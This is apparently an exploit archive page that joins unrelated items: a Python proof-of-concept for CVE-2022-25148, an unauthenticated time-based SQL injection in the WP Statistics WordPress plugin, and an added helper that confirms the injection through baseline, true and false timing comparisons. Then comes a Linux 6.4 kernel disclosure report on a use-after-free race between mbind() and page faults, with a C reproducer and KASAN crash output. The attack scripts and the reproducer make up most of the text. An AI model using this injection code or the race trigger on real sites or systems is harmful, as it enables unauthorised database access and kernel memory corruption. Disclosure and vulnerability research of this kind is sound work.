<pre><code># Exploit Title: WP Statistics Plugin <= 13.1.5 current_page_id - Time based SQL injection (Unauthenticated)<br /># Date: 13/02/2022<br /># Exploit Author: psychoSherlock<br /># Vendor Homepage: https://wp-statistics.com/<br /># Software Link: https://downloads.wordpress.org/plugin/wp-statistics.13.1.5.zip<br /># Version: 13.1.5 and prior<br /># Tested on: wp-statistics 13.1.5<br /># CVE : CVE-2022-25148<br /># Vendor URL: https://wordpress.org/plugins/wp-statistics/<br /># CVSS Score: 8.4 (High)<br /><br />import argparse<br />import re<br />import urllib.parse<br /><br />import requests<br /><br /><br />def main():<br />    parser = argparse.ArgumentParser(description="CVE-2022-25148")<br />    parser.add_argument('-u', '--url', required=True, help='WordPress base URL')<br />    args = parser.parse_args()<br />    base_url = args.url.rstrip('/')<br /><br />    # Time-based payload: if MySQL evaluates the expression, the response<br />    # is delayed by five seconds.<br />    payload = "IF(1=1, sleep(5), 1)"<br /><br />    wp_session = requests.session()<br /><br />    # The plugin embeds a REST nonce in every front-end page; the hit<br />    # endpoint is unauthenticated but still requires that nonce.<br />    resp = wp_session.get(base_url)<br />    match = re.search(r'_wpnonce=(.*?)&wp_statistics_hit', resp.text)<br />    if not match:<br />        print("Could not find the wp-statistics nonce; is the plugin active?")<br />        return<br />    nonce = match.group(1)<br />    print(f"Gathered Nonce: {nonce}")<br /><br />    headers = {<br />        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15"}<br /><br />    payload = urllib.parse.quote_plus(payload)<br />    exploit = f'/wp-json/wp-statistics/v2/hit?_=11&_wpnonce={nonce}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id={payload}&search_query&page_uri=/&user_id=0'<br />    exploit_url = base_url + exploit<br /><br />    print(f'\nSending: {exploit_url}')<br /><br />    resp = wp_session.get(exploit_url, headers=headers)<br /><br />    # resp.elapsed runs from sending the request until the response headers<br />    # arrive, which is where the server-side sleep() shows up.<br />    if resp.elapsed.total_seconds() >= 5.0:<br />        print("\n!!! Target is vulnerable !!!")<br />        print(f'\nTime taken: {resp.elapsed.total_seconds()}')<br />    else:<br />        print('Target is not vulnerable')<br /><br /><br />if __name__ == "__main__":<br />    main()<br /><br /></code></pre>
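The script above reports "vulnerable" after a single request that takes five seconds or longer, which a slow or overloaded WordPress host can also produce. As an added example (not the exploit author's code), the following Python wraps any `send(payload) -> seconds` callable in the usual three-way comparison: a baseline value, a true condition that should sleep, and a false condition that should not, each taken as the median of several trials. `make_sender` builds the same hit URL as the script for a live target but is not called here; the two timing models are constructed so the logic runs offline.

```python
import statistics
from urllib.parse import quote_plus

# Same endpoint and parameters as the script above; the payload goes into
# current_page_id.
HIT_QUERY = ("/wp-json/wp-statistics/v2/hit?_=11&_wpnonce={nonce}&wp_statistics_hit_rest="
             "&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no"
             "&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home"
             "&current_page_id={payload}&search_query&page_uri=/&user_id=0")


def make_sender(base_url, nonce, session):
    """Live `send` for a real target (not called in this example): issues one
    hit request with `payload` injected and returns seconds until headers."""
    def send(payload):
        url = base_url + HIT_QUERY.format(nonce=nonce, payload=quote_plus(payload))
        return session.get(url).elapsed.total_seconds()
    return send


def median_time(send, payload, trials):
    return statistics.median(send(payload) for _ in range(trials))


def time_based_verdict(send, delay=5.0, trials=3, margin=0.5):
    """Decide whether a time-based injection point is real.

    Three measurements are compared:
      baseline  : a harmless value ("1")
      true_case : IF(1=1, sleep(delay), 1)  -> slow only if the SQL runs
      false_case: IF(1=2, sleep(delay), 1)  -> as fast as baseline if it runs
    A slow server makes all three slow; only a real injection makes exactly
    the true case slow by about `delay`.
    """
    baseline = median_time(send, "1", trials)
    true_case = median_time(send, "IF(1=1, sleep(%d), 1)" % delay, trials)
    false_case = median_time(send, "IF(1=2, sleep(%d), 1)" % delay, trials)
    injectable = (true_case - baseline >= delay - margin
                  and false_case - baseline < delay - margin)
    return {"baseline": baseline, "true": true_case, "false": false_case,
            "injectable": injectable}


# Constructed timing models standing in for live targets.
def vulnerable_target(payload):
    """Evaluates the injected expression: sleeps only when the condition holds."""
    return 0.25 + (5.0 if "1=1" in payload else 0.0)


def slow_but_safe_target(payload):
    """Takes six seconds for every request; a single timing would misreport it."""
    return 6.0


if __name__ == "__main__":
    print("vulnerable:", time_based_verdict(vulnerable_target))
    print("slow host: ", time_based_verdict(slow_but_safe_target))
```

With a live target, `make_sender(base_url, nonce, requests.Session())` is the `send` to pass in; the nonce is the one the script above scrapes from the front page.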
<pre><code>Linux 6.4: UAF race between mbind() and VMA-locked page fault<br /><br />(tested on git master, at commit 57012c57536f)<br /><br />Summary:<br /><br />There's a race between mbind() and VMA-locked page faults, leading to a UAF.<br />You can quickly hit this with a straightforward reproducer that just keeps calling mbind() on one thread and causing page faults on another thread.<br />I'll send a suggested patch in a minute.<br /><br />mbind() replaces vma->vm_policy while holding only mmap_write_lock(), which does not exclude page faults handled under the per-VMA lock, and replacing the policy can involve freeing the old vma->vm_policy:<br /><br />sys_mbind<br />  kernel_mbind<br />    do_mbind<br />      mmap_write_lock<br />      mbind_range [for each vma in range]<br />        vma_replace_policy<br />          new = mpol_dup(...)<br />          old = vma->vm_policy<br />          vma->vm_policy = new<br />          mpol_put(old)<br />      mmap_write_unlock<br /><br /><br />VMA-locked page fault handling can allocate pages, which requires using the vma->vm_policy:<br /><br />do_user_addr_fault<br />  lock_vma_under_rcu<br />  handle_mm_fault<br />    __handle_mm_fault<br />      handle_pte_fault<br />        do_pte_missing<br />          do_anonymous_page<br />            vma_alloc_zeroed_movable_folio<br />              vma_alloc_folio<br />                get_vma_policy<br />                  __get_vma_policy<br />                    pol = vma->vm_policy ***race***<br />                    mpol_get(pol) [conditional on MPOL_F_SHARED]<br />                [do page allocation]<br />                mpol_cond_put(pol)<br />  vma_end_read<br /><br />Because of the mpol_cond_put(pol) call, it should be possible for this to manifest as a UAF write.<br /><br /><br />You can hit this race on a kernel with CONFIG_NUMA and CONFIG_KASAN very quickly (less than a second, I think) with this reproducer - you don't need an actual NUMA system for this, I've tested it in a QEMU VM without NUMA:<br /><br />==============<br />// gcc -pthread -o mbind-vs-pf mbind-vs-pf.c -Wall<br />#define _GNU_SOURCE<br />#include <pthread.h><br />#include <err.h><br />#include <unistd.h><br />#include <sys/syscall.h><br />#include <sys/mman.h><br />#include <linux/mempolicy.h><br /><br />#define SYSCHK(x) ({ \<br />  typeof(x) __res = (x); \<br />  if (__res == (typeof(x))-1L) \<br />    err(1, "SYSCHK(" #x ")"); \<br />  __res; \<br />})<br /><br />static char *vma;<br /><br />static void *fault_thread(void *arg) {<br />  while (1) {<br />    // fault in...<br />    *vma = 1;<br />    // ... and zero the PTE again with zap_page_range_single()<br />    SYSCHK(madvise(vma, 0x1000, MADV_DONTNEED));<br />  }<br />}<br /><br />static void mbind_vma(unsigned long policy) {<br />  unsigned long nmask = (1UL << 0);<br />  SYSCHK(syscall(__NR_mbind, vma, 0x1000, policy|0, &nmask, sizeof(nmask)*8+1, 0));<br />}<br /><br />int main(void) {<br />  vma = SYSCHK(mmap((void*)0x100000, 0x1000,<br />                    PROT_READ|PROT_WRITE|PROT_EXEC,<br />                    MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED_NOREPLACE, -1, 0));<br />  pthread_t thread;<br />  if (pthread_create(&thread, NULL, fault_thread, NULL))<br />    errx(1, "pthread_create");<br /><br />  while (1) {<br />    mbind_vma(MPOL_BIND);<br />    mbind_vma(MPOL_INTERLEAVE);<br />  }<br />}<br />==============<br /><br />This will give the following splat:<br /><br />==================================================================<br />BUG: KASAN: slab-use-after-free in vma_alloc_folio+0x93/0x220<br />Read of size 2 at addr ffff888007c0e6f6 by task mbind-vs-pf/556<br /><br />CPU: 3 PID: 556 Comm: mbind-vs-pf Not tainted 6.5.0-rc3-00123-g57012c57536f #304<br />Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014<br />Call Trace:<br /> <TASK><br /> dump_stack_lvl+0x36/0x50<br /> print_report+0xcf/0x660<br />[...]<br /> kasan_report+0xc7/0x100<br />[...]<br /> vma_alloc_folio+0x93/0x220<br /> __handle_mm_fault+0x71b/0x1060<br />[...]<br /> handle_mm_fault+0xbe/0x280<br /> do_user_addr_fault+0x196/0x630<br /> exc_page_fault+0x5c/0xc0<br /> asm_exc_page_fault+0x26/0x30<br />[...]<br /> </TASK><br /><br />Allocated by task 555:<br /> kasan_save_stack+0x33/0x60<br /> 
kasan_set_track+0x25/0x30<br /> __kasan_slab_alloc+0x6e/0x70<br /> kmem_cache_alloc+0xf5/0x260<br /> __mpol_dup+0x72/0x1c0<br /> vma_replace_policy+0x20/0xb0<br /> do_mbind+0x379/0x510<br /> kernel_mbind+0x11a/0x130<br /> do_syscall_64+0x3b/0x90<br /> entry_SYSCALL_64_after_hwframe+0x6e/0xd8<br /><br />Freed by task 555:<br /> kasan_save_stack+0x33/0x60<br /> kasan_set_track+0x25/0x30<br /> kasan_save_free_info+0x2b/0x50<br /> __kasan_slab_free+0x10a/0x180<br /> kmem_cache_free+0xaa/0x380<br /> vma_replace_policy+0x87/0xb0<br /> do_mbind+0x379/0x510<br /> kernel_mbind+0x11a/0x130<br /> do_syscall_64+0x3b/0x90<br /> entry_SYSCALL_64_after_hwframe+0x6e/0xd8<br />[...]<br />==================================================================<br /><br />If I leave the reproducer running some more, I get other crashes, like in the KASAN internals, that suggest that the reproducer is already causing memory corruption.<br /><br />In case you're curious: I found this by grepping for mmap_write_lock*() calls and looking at most of them to figure out if they do anything interesting to VMAs without taking VMA locks.<br /><br /><br />This bug is subject to a 90-day disclosure deadline. If a fix for this<br />issue is made available to users before the end of the 90-day deadline,<br />this bug report will become public 30 days after the fix was made<br />available. Otherwise, this bug report will become public at the deadline.<br />The scheduled deadline is 2023-10-26.<br /><br /><br /><br /><br />Found by: jannh@google.com<br /><br /></code></pre>